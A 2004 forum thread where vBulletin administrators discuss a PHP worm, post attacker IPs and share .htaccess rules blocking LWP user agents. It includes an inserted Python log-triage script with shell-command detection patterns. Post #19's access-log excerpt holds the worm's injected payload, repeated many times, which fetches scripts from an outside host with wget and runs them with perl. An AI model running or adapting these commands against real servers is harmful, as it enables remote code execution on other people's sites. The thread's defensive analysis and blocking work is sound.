
showthread attack attempt?


  • #16
    To view the coding right click the broken image and save it to disk. Rename it giving it .txt extension and then open it in any text editor.
    Admins Zone - Resources for Forum Administrators

    Comment


    • #17
      It is easy to block them. Put the code of the attachment into .htaccess
      Attached Files
      Streicher

      Comment


      • #18
        I'll try that on my site as I now have more than 650 worms trying to exploit my vB haha

        Comment


        • #19
          Same happened to mine last night.
          Server admin has sent me a full log; don't know if it is of any use.
          Please talk to vBulletin about the following security hole in their system. Intruder got in last night through your site the following way and uploaded files to the temp dir and is driving load on the server up.
          The vulnerability is in:
          save-concorde.org.uk/forums/printthread.php?t=1134/showthread.php?

          The hacker's IP is 66.90.67.40, 64.191.63.149 etc.


          Code:
          ###########################
          save-concorde.org.uk:64.191.63.149 - - [25/Dec/2004:09:03:27 -0500] "GET 
          /forums/printthread.php?t=1134/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET 
          /forums/printthread.php?t=1134/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET 
          /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11380 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET 
          /forums/printthread.php?t=1134/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:02 -0500] "GET 
          /forums/printthread.php?t=1229/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 3731 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:03 -0500] "GET 
          /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11383 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:03 -0500] "GET 
          /forums/printthread.php?t=1229/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 3731 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:55 -0500] "GET 
          /forums/printthread.php?t=907/printthread.php?t=907&pp=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:55 -0500] "GET 
          /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11383 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:56 -0500] "GET 
          /forums/printthread.php?t=907/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:56 -0500] "GET 
          /forums/printthread.php?t=907/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:59 -0500] "GET 
          /forums/printthread.php?t=907/printthread.php?t=907&pp=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:20:02 -0500] "GET 
          /forums/printthread.php?t=907/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          Last edited by Jerry; Sun 26 Dec '04, 9:49am.

          Comment


          • #20
            Your admin doesn't know what he's talking about. It's a worm that's trying to attack ALL PHP scripts by attempting to pass a long string into ALL variables it can find. The problem is that on Google vBulletin is the most popular PHP link, so we're getting more attacks.

            If something actually wrote something to the tmp directory then it wasn't from vBulletin.

            http://securityfocus.com/archive/1/3...2/2004-12-28/0
            Scott MacVicar

            My Blog | Twitter

            Comment


            • #21
              Originally posted by Streicher
              It is easy to block them. Put the code of the attachment into .htaccess
              Thank you, that fixed the problem for me. I don't have the worm/bots browsing the forums anymore.

              meow

              Comment


              • #22
                I've had these unusual bots going through just the archives of the forum and turned them off until I learned more. They all had user agents like lwp-trivial/1.41 or LWP::Simple/5.803

                Here's a typical link they are hitting in the archives:
                http://dionysians.org/forum/archive/...68%5D%29.%2527

                Comment


                • #23
                  So they aren't actually a threat, as vBulletin is secure in this particular manner?

                  I hate having to use HTACCESS for anything much other than disabling directory viewing.

                  Alcar...
                  http://www.oddworldforums.net

                  Comment


                  • #24
                    What's happening is these worms are trying every variable they can find and attempting to exploit them, Alcar.

                    The .htaccess is merely to jam up the bots from bombarding and overwhelming your server. It won't affect your users.
                    ManagerJosh, Owner of 4 XenForo Licenses, 1 vBulletin Legacy License, 1 Internet Brands Suite License
                    Director, WorldSims.org | Gaming Hosting Administrator, SimGames.net, Urban Online Entertainment

                    Comment


                    • #25
                      Just an FYI for those who are blocking by IP, I caught these guys running around my site..


                      67.15.52.18
                      LWP::Simple/5.803
                      69.93.114.234
                      LWP::Simple/5.65
                      81.4.64.206
                      LWP::Simple/5.63
                      66.98.172.100
                      LWP::Simple/5.65
                      66.98.152.87
                      LWP::Simple/5.65
                      69.93.114.234
                      LWP::Simple/5.65
                      ManagerJosh, Owner of 4 XenForo Licenses, 1 vBulletin Legacy License, 1 Internet Brands Suite License
                      Director, WorldSims.org | Gaming Hosting Administrator, SimGames.net, Urban Online Entertainment

                      Comment


                      • #26
                        Can't really be done by IP address since any exploited box will do it.

                        Yesterday morning when I saw it happening, I also blocked it with a quick .htaccess entry, which worked. In case anyone couldn't get it to work with the one posted for whatever reason, this is what I'm using:

                        Code:
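                        # Return 403 Forbidden to any client whose User-Agent starts with "LWP" or "lwp".
                        # The trailing "*" was dropped: as a regex, "^LWP*" also matched agents starting with just "LW".
                        RewriteEngine on
                        RewriteCond %{HTTP_USER_AGENT}  ^LWP [OR]
                        RewriteCond %{HTTP_USER_AGENT}  ^lwp
                        RewriteRule  .*      - [F]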
                        Sphinx Search for vBulletin 4: https://marketplace.digitalpoint.com...tin-4.870/item
                        Someone send me a message on Twitter when this site is usable again. https://twitter.com/digitalpoint

                        Comment
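As an added example (not code from any post in this thread), a Python triage script that flags these probes in an access log by request shape rather than by source IP, since the sources are just other compromised hosts and a User-Agent rule misses any client that changes its agent string. The sample log lines are constructed with documentation hosts and addresses, and treating `t`, `f` and `pp` as integer-only parameters is an assumption of this example.

```python
import re

# vhost-prefixed combined log format, as in the log excerpt posted in this thread
LINE_RE = re.compile(
    r'^(?P<vhost>[^:\s]+):(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$')
REMOTE_URL = re.compile(r'(?:https?|ftp)://', re.I)            # URL where an id belongs
SHELL_HINT = re.compile(r'[;|`]|\b(?:wget|curl|perl)\b', re.I)  # command-like value
NUMERIC_PARAMS = {'t', 'f', 'pp'}  # assumption: these carry integer ids only

# Constructed sample lines (hosts and addresses are documentation values).
SAMPLE_LOG = [
    'forum.example.org:192.0.2.10 - - [25/Dec/2004:09:03:27 -0500] "GET /forums/printthread.php?t=1134/showthread.php?t=http://files.example.net/x.gif?&cmd=cd%20/tmp;wget%20files.example.net/a.txt;perl%20a.txt HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"',
    'forum.example.org:198.51.100.7 - - [25/Dec/2004:09:04:01 -0500] "GET /forums/showthread.php?t=1134 HTTP/1.1" 200 20311 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    'forum.example.org:203.0.113.5 - - [25/Dec/2004:09:05:12 -0500] "GET /forums/forumdisplay.php?f=http://files.example.net/x.gif?&cmd=wget%20files.example.net/a.txt HTTP/1.1" 200 3731 "-" "Mozilla/4.0 (compatible)"',
]

def percent_decode(raw):
    """Decode %XX escapes so encoded spaces and separators are visible to the checks."""
    return re.sub(r'%([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), raw)

def classify(line):
    """Return (ip, sorted findings) for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    findings = set()
    if m['ua'].lower().startswith('lwp'):
        findings.add('lwp-user-agent')
    query = m['target'].partition('?')[2]      # everything after the first '?'
    for pair in query.split('&'):
        key, _, raw = pair.partition('=')
        value = percent_decode(raw)
        if REMOTE_URL.search(value):
            findings.add('remote-url-in-param')
        if key in NUMERIC_PARAMS and not value.isdigit():
            findings.add('non-numeric-id')
        if SHELL_HINT.search(value):
            findings.add('shell-command-in-param')
    return m['ip'], sorted(findings)

def suspicious(lines):
    """Map source IP -> findings for every parsed line with at least one finding."""
    results = (classify(line) for line in lines)
    return {ip: found for ip, found in filter(None, results) if found}

if __name__ == '__main__':
    for ip, found in suspicious(SAMPLE_LOG).items():
        print(ip, ', '.join(found))
```

The third sample line uses a browser-like agent and is still flagged, which is the case a User-Agent rule alone does not cover.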


                        • #27
                          Also see http://www.vbulletin.com/forum/showthread.php?t=124244

                          Several of us have been seeing this.

                          Comment


                          • #28
                            Hmmm, so that's why our long-standing (year and a half, or thereabouts) Most users ever online was broken yesterday. Saw a bunch of LWP'ers on WOL so I banned the lot.

                            Thanks for the info, all.
                            TheologyWeb. We debate theology. srsly.

                            Comment


                            • #29
                              Originally posted by Streicher
                              It is easy to block them. Put the code of the attachment into .htaccess
                              I applied this and the bots are slowly but surely reducing in number.
                              My Football Forum

                              Comment


                              • #30
                                Yeah, they have all gone now. Thank you very much.
                                My Football Forum

                                Comment
